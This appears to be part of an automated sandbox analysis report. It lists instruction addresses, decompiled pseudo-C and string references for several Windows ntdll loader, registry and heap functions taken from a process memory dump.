                                                      0x04969c42
                                                      0x04969c3c
                                                      0x04969c02
                                                      0x049187da
                                                      0x049187df
                                                      0x049187e3
                                                      0x00000000
                                                      0x00000000
                                                      0x049187e3
                                                      0x049187f2
                                                      0x00000000
                                                      0x049187fb
                                                      0x049187fd
                                                      0x049187fe
                                                      0x0491880e
                                                      0x0491880f
                                                      0x04918810
                                                      0x04918814
                                                      0x0491881a
                                                      0x0491881c
                                                      0x0491881f
                                                      0x04918821
                                                      0x04918822
                                                      0x04918824
                                                      0x04918826
                                                      0x0491882c
                                                      0x0491882e
                                                      0x04969c48
                                                      0x04969c48
                                                      0x04918834
                                                      0x04918834
                                                      0x04918837
                                                      0x00000000
                                                      0x00000000
                                                      0x04918837
                                                      0x0491882e
                                                      0x0491883d
                                                      0x04918840
                                                      0x04918843
                                                      0x04918846
                                                      0x04918849
                                                      0x0491884c
                                                      0x0491884e
                                                      0x04918850
                                                      0x04918852
                                                      0x04918854
                                                      0x04918857
                                                      0x049188b4
                                                      0x049188b6
                                                      0x049188b6
                                                      0x04918859
                                                      0x04918859
                                                      0x04918859
                                                      0x04918861
                                                      0x04918866
                                                      0x0491886a
                                                      0x0491893d
                                                      0x04918941
                                                      0x00000000
                                                      0x04918947
                                                      0x04918947
                                                      0x0491894a
                                                      0x0491894c
                                                      0x00000000
                                                      0x04918952
                                                      0x04918955
                                                      0x0491895a
                                                      0x0491895d
                                                      0x0491895d
                                                      0x0491895f
                                                      0x04918961
                                                      0x04918961
                                                      0x04918968
                                                      0x00000000
                                                      0x00000000
                                                      0x0491896a
                                                      0x0491896b
                                                      0x0491896e
                                                      0x00000000
                                                      0x04918970
                                                      0x04918970
                                                      0x04918970
                                                      0x04918970
                                                      0x04918972
                                                      0x04918972
                                                      0x04918974
                                                      0x00000000
                                                      0x0491897a
                                                      0x0491897a
                                                      0x0491897d
                                                      0x00000000
                                                      0x04918983
                                                      0x04969c65
                                                      0x04969c6d
                                                      0x04969c72
                                                      0x04969c75
                                                      0x04969c75
                                                      0x04969c82
                                                      0x04969c86
                                                      0x04969c87
                                                      0x04969c88
                                                      0x04969c89
                                                      0x04969c8c
                                                      0x04969c90
                                                      0x04969c95
                                                      0x04969c97
                                                      0x04969ca0
                                                      0x04969ca3
                                                      0x04969ca9
                                                      0x04969ca9
                                                      0x00000000
                                                      0x04969ca9
                                                      0x04969ca3
                                                      0x00000000
                                                      0x04969c97
                                                      0x0491897d
                                                      0x00000000
                                                      0x04918974
                                                      0x04918988
                                                      0x04918992
                                                      0x04918996
                                                      0x00000000
                                                      0x04918996
                                                      0x0491894c
                                                      0x00000000
                                                      0x04918870
                                                      0x0491887b
                                                      0x0491887d
                                                      0x0491887f
                                                      0x04918881
                                                      0x04918884
                                                      0x04918884
                                                      0x04918886
                                                      0x04918889
                                                      0x0491888c
                                                      0x0491888e
                                                      0x04918891
                                                      0x04918891
                                                      0x04918898
                                                      0x00000000
                                                      0x00000000
                                                      0x0491889a
                                                      0x0491889b
                                                      0x0491889e
                                                      0x00000000
                                                      0x00000000
                                                      0x049188a0
                                                      0x049188a8
                                                      0x049188b0
                                                      0x049188b2
                                                      0x049188d3
                                                      0x049188d5
                                                      0x00000000
                                                      0x049188d7
                                                      0x049188db
                                                      0x049188dc
                                                      0x049188e0
                                                      0x049188e8
                                                      0x049188ee
                                                      0x049188f0
                                                      0x049188f3
                                                      0x049188fc
                                                      0x04918901
                                                      0x04918906
                                                      0x0491890c
                                                      0x0491890c
                                                      0x0491890f
                                                      0x04918916
                                                      0x04918917
                                                      0x04918918
                                                      0x04918919
                                                      0x0491891a
                                                      0x0491891f
                                                      0x04918921
                                                      0x04969c52
                                                      0x04969c55
                                                      0x04969c5b
                                                      0x04969cac
                                                      0x04969cc0
                                                      0x04969cc0
                                                      0x04969c55
                                                      0x04918927
                                                      0x04918927
                                                      0x0491892f
                                                      0x04918933
                                                      0x00000000
                                                      0x049188f5
                                                      0x049188f5
                                                      0x00000000
                                                      0x049188f7
                                                      0x049188f7
                                                      0x049188fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049188fa
                                                      0x049188f5
                                                      0x049188f3
                                                      0x00000000
                                                      0x049188d5
                                                      0x00000000
                                                      0x049188b2
                                                      0x049188c9
                                                      0x00000000
                                                      0x049188c9
                                                      0x0491887f
                                                      0x0491886a
                                                      0x04918857
                                                      0x04918852
                                                      0x049188bf
                                                      0x049188bf
                                                      0x049187aa
                                                      0x049187ad
                                                      0x049187ae
                                                      0x049187b4
                                                      0x049187b5
                                                      0x049187b6
                                                      0x049187b8
                                                      0x049187bd
                                                      0x049187c1
                                                      0x049187f4
                                                      0x049187fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049187c1
                                                      0x00000000

                                                      Strings
                                                      • LdrpDoPostSnapWork, xrefs: 04969C1E
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 04969C28
                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04969C18
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-1948996284
                                                      • Opcode ID: c1d6b8ae4fe36c3a2ca74b16d9187f9a9a631c34fbb26a5e9fa470af18fc5fd8
                                                      • Instruction ID: ef3b0f60a519d27f18f1435e53edbbde25faaf789bf151aee98c4fb6a3595b92
                                                      • Opcode Fuzzy Hash: c1d6b8ae4fe36c3a2ca74b16d9187f9a9a631c34fbb26a5e9fa470af18fc5fd8
                                                      • Instruction Fuzzy Hash: EA91F371A0021EAFEF18EF59C480ABA77B9FF84354B1545B9D915AB260E730FD01EB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04917E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E04917E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0491CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0490C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x49f5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04985510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x49f5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04927D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04927D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04987016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04927D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04927D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04987016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0493A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0490B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                      0x04917e4c
                                                      0x04917e50
                                                      0x04917e55
                                                      0x04917e58
                                                      0x04917e5d
                                                      0x04917e71
                                                      0x04917f33
                                                      0x04917e77
                                                      0x04917e77
                                                      0x04917e79
                                                      0x04917e79
                                                      0x04917e7e
                                                      0x04917f45
                                                      0x04969848
                                                      0x00000000
                                                      0x04969848
                                                      0x04917f4e
                                                      0x04917f53
                                                      0x04917f5a
                                                      0x00000000
                                                      0x00000000
                                                      0x0496985a
                                                      0x04969862
                                                      0x04969866
                                                      0x00000000
                                                      0x0496986c
                                                      0x00000000
                                                      0x0496986c
                                                      0x04917e84
                                                      0x04917e84
                                                      0x04917e8d
                                                      0x04969871
                                                      0x04917eb8
                                                      0x04917ec0
                                                      0x04917ec0
                                                      0x04917e9a
                                                      0x0496987e
                                                      0x00000000
                                                      0x00000000
                                                      0x04969884
                                                      0x0496988b
                                                      0x049698a7
                                                      0x049698ac
                                                      0x049698b1
                                                      0x049698b6
                                                      0x049698b8
                                                      0x049698b8
                                                      0x049698b9
                                                      0x00000000
                                                      0x049698b9
                                                      0x04917ea0
                                                      0x04917ea7
                                                      0x00000000
                                                      0x00000000
                                                      0x04917eac
                                                      0x04917eb1
                                                      0x04917ec6
                                                      0x04917ed0
                                                      0x049698cc
                                                      0x04917ed6
                                                      0x04917ed6
                                                      0x04917ed6
                                                      0x04917ede
                                                      0x04917ee3
                                                      0x049698e3
                                                      0x049698f0
                                                      0x04969902
                                                      0x049698f2
                                                      0x049698fb
                                                      0x049698fb
                                                      0x04969907
                                                      0x0496991d
                                                      0x0496991d
                                                      0x04969907
                                                      0x049698e3
                                                      0x04917ef0
                                                      0x04917f14
                                                      0x04917f14
                                                      0x04917f1e
                                                      0x04969946
                                                      0x04917f24
                                                      0x04917f24
                                                      0x04917f24
                                                      0x04917f2c
                                                      0x0496996a
                                                      0x04969975
                                                      0x04969975
                                                      0x0496997e
                                                      0x04969993
                                                      0x04969993
                                                      0x0496997e
                                                      0x00000000
                                                      0x04917ef2
                                                      0x04917efc
                                                      0x04917f0a
                                                      0x04917f0e
                                                      0x04969933
                                                      0x00000000
                                                      0x04969933
                                                      0x00000000
                                                      0x04917f0e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04917eb1

                                                      Strings
                                                      • LdrpCompleteMapModule, xrefs: 04969898
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 04969891
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 049698A2
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 5c0431ebb7caeab4d552eddf90b9c1fbda7800cd5306c0a798b1efc4d2022215
                                                      • Instruction ID: 3f5cf157f73eb28b2bc2317b3a3178712a75e7999d08b6f389c3c6dda74add9d
                                                      • Opcode Fuzzy Hash: 5c0431ebb7caeab4d552eddf90b9c1fbda7800cd5306c0a798b1efc4d2022215
                                                      • Instruction Fuzzy Hash: 6D51D37160474A9FE721CF98C988B2ABBE9AB41714F140AB9E8529B7F1D774FD00CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E0490E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0490F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E049495D0();
						}
						if(_t78 != 0) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0494FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0494BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04949600();
					if(_t97 < 0) {
						goto L6;
					}
					E0494BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0490F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0494BB40(_t83, _t102 + 0x24, _t78);
								if(L049143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0494BB40(_t84, _t102 + 0x24, _t94);
									if(L049143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                      0x0490e620
                                                      0x0490e628
                                                      0x0490e62f
                                                      0x0490e631
                                                      0x0490e635
                                                      0x0490e637
                                                      0x0490e63e
                                                      0x04965503
                                                      0x04965503
                                                      0x0490e64c
                                                      0x0490e64c
                                                      0x0490e651
                                                      0x00000000
                                                      0x00000000
                                                      0x0490e661
                                                      0x0490e665
                                                      0x0496542a
                                                      0x0490e715
                                                      0x0490e71a
                                                      0x0490e71c
                                                      0x0490e720
                                                      0x0490e720
                                                      0x0490e727
                                                      0x0490e736
                                                      0x0490e736
                                                      0x0490e743
                                                      0x0490e743
                                                      0x0490e673
                                                      0x0490e678
                                                      0x0490e67d
                                                      0x0490e682
                                                      0x0490e685
                                                      0x0490e692
                                                      0x0490e69b
                                                      0x0490e6a3
                                                      0x0490e6ad
                                                      0x0490e6b1
                                                      0x0490e6b2
                                                      0x0490e6bb
                                                      0x0490e6bf
                                                      0x0490e6c0
                                                      0x0490e6c8
                                                      0x0490e6cc
                                                      0x0490e6d5
                                                      0x0490e6d9
                                                      0x00000000
                                                      0x00000000
                                                      0x0490e6e5
                                                      0x0490e6ea
                                                      0x0490e6f9
                                                      0x0490e70b
                                                      0x0490e70f
                                                      0x04965439
                                                      0x0496545e
                                                      0x0496545e
                                                      0x00000000
                                                      0x0496545e
                                                      0x0496543b
                                                      0x0496543e
                                                      0x04965440
                                                      0x04965445
                                                      0x04965472
                                                      0x04965475
                                                      0x0496548d
                                                      0x04965493
                                                      0x049654a9
                                                      0x00000000
                                                      0x00000000
                                                      0x049654ab
                                                      0x049654b4
                                                      0x049654bc
                                                      0x049654c8
                                                      0x049654de
                                                      0x049654fb
                                                      0x049654e0
                                                      0x049654e6
                                                      0x049654eb
                                                      0x049654eb
                                                      0x049654de
                                                      0x00000000
                                                      0x049654bc
                                                      0x04965477
                                                      0x0496547a
                                                      0x04965480
                                                      0x04965483
                                                      0x04965486
                                                      0x0496548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0496548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04965447
                                                      0x04965447
                                                      0x04965447
                                                      0x04965447
                                                      0x0496544e
                                                      0x00000000
                                                      0x00000000
                                                      0x04965450
                                                      0x04965452
                                                      0x04965455
                                                      0x0496545a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0496545c
                                                      0x0496546a
                                                      0x0496546d
                                                      0x0496546f
                                                      0x00000000
                                                      0x0496546f
                                                      0x0490e70f

                                                      Strings
                                                      • InstallLanguageFallback, xrefs: 0490E6DB
                                                      • @, xrefs: 0490E6C0
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0490E68C
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: 790b4f0fd3153c347af6ee509db4a7c87ceaa0c0304f813c907178bd57aa92d9
                                                      • Instruction ID: 283d8058f8019aa16dfdff05a847f32845529b66f96d9c53768f2fc67cbd2ef4
                                                      • Opcode Fuzzy Hash: 790b4f0fd3153c347af6ee509db4a7c87ceaa0c0304f813c907178bd57aa92d9
                                                      • Instruction Fuzzy Hash: E2519EB2508315ABDB20DF24D440A6BB3EDAFC8764F05497EF986D7240F734EA0487A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049CE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E049CE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E049CBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E049CBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E049CAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04949730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E049CA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E049CA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04949730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E049CA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E049CA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04922280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0491B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0491FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04927D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E049BFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                      0x049ce547
                                                      0x049ce549
                                                      0x049ce54f
                                                      0x049ce553
                                                      0x049ce557
                                                      0x049ce55a
                                                      0x049ce55c
                                                      0x049ce55f
                                                      0x049ce561
                                                      0x049ce567
                                                      0x049ce56b
                                                      0x049ce7e2
                                                      0x00000000
                                                      0x049ce571
                                                      0x049ce575
                                                      0x049ce577
                                                      0x049ce57b
                                                      0x049ce57c
                                                      0x049ce57d
                                                      0x049ce57e
                                                      0x049ce57f
                                                      0x049ce588
                                                      0x049ce58f
                                                      0x049ce591
                                                      0x049ce592
                                                      0x049ce592
                                                      0x049ce596
                                                      0x049ce59e
                                                      0x049ce5a0
                                                      0x049ce5a6
                                                      0x049ce61d
                                                      0x049ce61d
                                                      0x049ce621
                                                      0x049ce623
                                                      0x049ce630
                                                      0x049ce630
                                                      0x049ce7e6
                                                      0x049ce7eb
                                                      0x049ce7ed
                                                      0x049ce7f4
                                                      0x049ce7fa
                                                      0x049ce7ff
                                                      0x049ce7ff
                                                      0x049ce80a
                                                      0x049ce812
                                                      0x049ce812
                                                      0x049ce5ab
                                                      0x049ce5b4
                                                      0x049ce5b9
                                                      0x049ce5be
                                                      0x049ce5c0
                                                      0x049ce5c2
                                                      0x049ce5c8
                                                      0x049ce5c9
                                                      0x049ce5cb
                                                      0x049ce5cc
                                                      0x049ce5d5
                                                      0x049ce5e4
                                                      0x049ce5f1
                                                      0x049ce5f8
                                                      0x049ce5f8
                                                      0x049ce5d5
                                                      0x049ce602
                                                      0x049ce616
                                                      0x049ce63d
                                                      0x049ce644
                                                      0x049ce64d
                                                      0x049ce652
                                                      0x049ce657
                                                      0x049ce659
                                                      0x049ce65b
                                                      0x049ce661
                                                      0x049ce662
                                                      0x049ce664
                                                      0x049ce665
                                                      0x049ce66e
                                                      0x049ce67d
                                                      0x049ce68a
                                                      0x049ce691
                                                      0x049ce691
                                                      0x049ce66e
                                                      0x049ce6b0
                                                      0x00000000
                                                      0x049ce6b6
                                                      0x049ce6bd
                                                      0x049ce6c7
                                                      0x049ce6d7
                                                      0x049ce6d9
                                                      0x049ce6db
                                                      0x049ce6de
                                                      0x049ce6e3
                                                      0x049ce6f3
                                                      0x049ce6fc
                                                      0x049ce700
                                                      0x049ce700
                                                      0x049ce704
                                                      0x049ce70a
                                                      0x049ce70a
                                                      0x049ce713
                                                      0x049ce716
                                                      0x049ce719
                                                      0x049ce720
                                                      0x049ce761
                                                      0x049ce76b
                                                      0x049ce774
                                                      0x049ce77a
                                                      0x049ce77a
                                                      0x049ce78a
                                                      0x049ce791
                                                      0x049ce799
                                                      0x049ce79b
                                                      0x049ce79f
                                                      0x049ce7aa
                                                      0x049ce7c0
                                                      0x049ce7ac
                                                      0x049ce7b2
                                                      0x049ce7b9
                                                      0x049ce7b9
                                                      0x049ce7c7
                                                      0x049ce806
                                                      0x00000000
                                                      0x049ce7c9
                                                      0x049ce7d1
                                                      0x049ce7d8
                                                      0x00000000
                                                      0x049ce7d8
                                                      0x00000000
                                                      0x00000000
                                                      0x049ce722
                                                      0x049ce72e
                                                      0x049ce748
                                                      0x049ce74c
                                                      0x049ce754
                                                      0x049ce756
                                                      0x049ce75c
                                                      0x049ce75c
                                                      0x00000000
                                                      0x049ce75c
                                                      0x049ce758
                                                      0x049ce758
                                                      0x00000000
                                                      0x049ce758
                                                      0x049ce750
                                                      0x00000000
                                                      0x00000000
                                                      0x049ce752
                                                      0x00000000
                                                      0x049ce752
